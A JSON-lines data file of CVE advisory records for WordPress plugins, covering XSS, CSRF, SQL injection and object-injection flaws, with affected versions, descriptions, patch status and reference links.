{"CVE_ID":"CVE-2024-6856","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9700845e-89ca-4f9b-95f0-4b46a975b662\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9700845e-89ca-4f9b-95f0-4b46a975b662\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7869","slug":"123-chat-videochat","versionImpact":"1.3.1","description":"The 123.chat - Video Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d4469e4-5d99-4a56-bde8-9a0aaca7794f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d4469e4-5d99-4a56-bde8-9a0aaca7794f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/123-chat-videochat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/123-chat-videochat\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9373","slug":"elemenda","versionImpact":"0.0.2","description":"The Elemenda plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elemenda\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elemenda\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11032","slug":"wp-parsidate","versionImpact":"5.1.1","description":"The Parsi Date plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-parsidate\\\/tags\\\/5.1.1\\\/includes\\\/general.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-parsidate\\\/tags\\\/5.1.1\\\/includes\\\/general.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195986\\\/wp-parsidate\\\/trunk\\\/includes\\\/general.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195986\\\/wp-parsidate\\\/trunk\\\/includes\\\/general.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-parsidate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-parsidate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13878","slug":"spotbot","versionImpact":"0.1.8","description":"The SpotBot WordPress plugin through 0.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882b2022-4ed6-4d9e-8b35-f48ea1580884\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882b2022-4ed6-4d9e-8b35-f48ea1580884\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2575","slug":"z-companion","versionImpact":"1.1.1","description":"The Z Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. Note: This requires Royal Shop theme to be installed.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/importer\\\/wxr-importer.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/z-companion\\\/trunk\\\/import\\\/inc\\\/importer.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270130\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270130\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/z-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/z-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f7bba4-76c3-4904-bd96-2074147b33f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f7bba4-76c3-4904-bd96-2074147b33f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4803","slug":"wppedia","versionImpact":"1.3.0","description":"The Glossary by WPPedia \u2013 Best Glossary plugin for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.0 via deserialization of untrusted input from the 'posttypes' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/bfiessinger\\\/wppedia\\\/blob\\\/1d0b8568349c9c9479372f845a812eb2aa4b3d09\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"name\":\"https:\\\/\\\/github.com\\\/bfiessinger\\\/wppedia\\\/blob\\\/1d0b8568349c9c9479372f845a812eb2aa4b3d09\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/class-options.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/class-options.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wppedia\\\/tags\\\/1.3.0\\\/core\\\/classes\\\/traits\\\/trait-sanitizes-data.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53fb54bc-6eaa-4e99-a41c-e59a9bae81e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53fb54bc-6eaa-4e99-a41c-e59a9bae81e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5842","slug":"mdl-shortcodes","versionImpact":"1.1.4","description":"The Modern Design Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mdl-shortcodes\\\/trunk\\\/mdl-shortcodes.php#L197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mdl-shortcodes\\\/trunk\\\/mdl-shortcodes.php#L197\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mdl-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mdl-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be519d5-b505-4b5d-9f14-c8544e8f8298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1be519d5-b505-4b5d-9f14-c8544e8f8298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6382","slug":"taeggie-feed","versionImpact":"0.1.10","description":"The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's taeggie-feed shortcode in all versions up to, and including, 0.1.10. The plugin\u2019s render() method takes the user-supplied name attribute and injects it directly into a <script> tag - both in the id attribute and inside jQuery.getScript() - without proper escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f5ac78-5195-4b59-abc7-f41e487f9361?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f5ac78-5195-4b59-abc7-f41e487f9361?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28663","slug":"formidablepro-2-pdf","versionImpact":"3.09","description":"The Formidable PRO2PDF WordPress Plugin, version < 3.11, is affected by an authenticated SQL injection vulnerability in the \u2018fieldmap\u2019 parameter in the fpropdf_export_file action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2716","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'ajax_upload_file' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload a file to the contact, and then lists all the other uploaded files related to the contact.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c5bde0e-3138-4995-92ae-6deaf6b7be5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c5bde0e-3138-4995-92ae-6deaf6b7be5b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L458\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5334","slug":"responsive-header-image-slider","versionImpact":"3.2.1","description":"The WP Responsive header image slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sp_responsiveslider' shortcode in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6953dea2-ca2d-4283-97c2-45c3420d9390?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6953dea2-ca2d-4283-97c2-45c3420d9390?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-header-image-slider\\\/trunk\\\/responsive_headerimageslider.php#L343\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-header-image-slider\\\/trunk\\\/responsive_headerimageslider.php#L343\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2350","slug":"cafe-lite","versionImpact":"2.1.9","description":"The Clever Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CAFE Icon, CAFE Team Member, and CAFE Slider widgets in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca5befe9-7769-4367-84cf-05aabeced67a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca5befe9-7769-4367-84cf-05aabeced67a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-icon.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-icon.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-team-member.php#L948\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-team-member.php#L948\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-slider.php#L1394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-slider.php#L1394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7548","slug":"learnpress","versionImpact":"4.2.6.9.3","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'order' parameter in all versions up to, and including, 4.2.6.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702715a9-b180-4d31-a1df-37b732ae8226?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702715a9-b180-4d31-a1df-37b732ae8226?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/curds\\\/class-lp-course-curd.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/curds\\\/class-lp-course-curd.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/learnpress\\\/tags\\\/4.2.6.9.3\\\/inc\\\/curds\\\/class-lp-course-curd.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/learnpress\\\/tags\\\/4.2.6.9.3\\\/inc\\\/curds\\\/class-lp-course-curd.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132019\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132019\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132002\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6855","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating exit popups, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1124b07a-6274-49df-be77-615fda8f3a38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1124b07a-6274-49df-be77-615fda8f3a38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9366","slug":"easy-menu-manager-wpzest","versionImpact":"1.0.1","description":"The Easy Menu Manager | WPZest plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f60df43a-eef3-449d-96fd-b26e28361f81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f60df43a-eef3-449d-96fd-b26e28361f81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-menu-manager-wpzest\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-menu-manager-wpzest\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9170","slug":"woocommerce-jetpack","versionImpact":"7.2.3","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wcj_product_meta shortcode in all versions up to, and including, 7.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with ShopManager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/booster.io\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/booster.io\\\/shortcodes\\\/wcj_product_meta\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/shortcodes\\\/wcj_product_meta\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-shortcodes.php#L963\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-shortcodes.php#L963\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3187178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3187178\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12572","slug":"hello-in-all-languages","versionImpact":"1.0.6","description":"The Hello In All Languages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-in-all-languages\\\/trunk\\\/hello-in-all-languages.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-in-all-languages\\\/trunk\\\/hello-in-all-languages.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85501fc0-5d51-492b-b208-4b84f371ee77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85501fc0-5d51-492b-b208-4b84f371ee77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13334","slug":"car-demon","versionImpact":"1.8.1","description":"The Car Demon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_condition' parameter in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/car-demon\\\/trunk\\\/search\\\/search-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/car-demon\\\/trunk\\\/search\\\/search-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d50b1c0-9687-4ce2-bfba-c2d6a2fc28dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d50b1c0-9687-4ce2-bfba-c2d6a2fc28dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13706","slug":"wp-image-uploader","versionImpact":"1.0.1","description":"The WP Image Uploader plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'file' parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-uploader\\\/trunk\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea1546c-1d8f-4478-81b7-20a9096e0217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea1546c-1d8f-4478-81b7-20a9096e0217?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12813","slug":"open-hours","versionImpact":"1.0.9","description":"The Open Hours \u2013  Easy Opening Hours plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'open-hours-current-status' shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/open-hours\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/open-hours\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3feb5f46-e861-40ec-84e8-aade0667eec6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3feb5f46-e861-40ec-84e8-aade0667eec6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
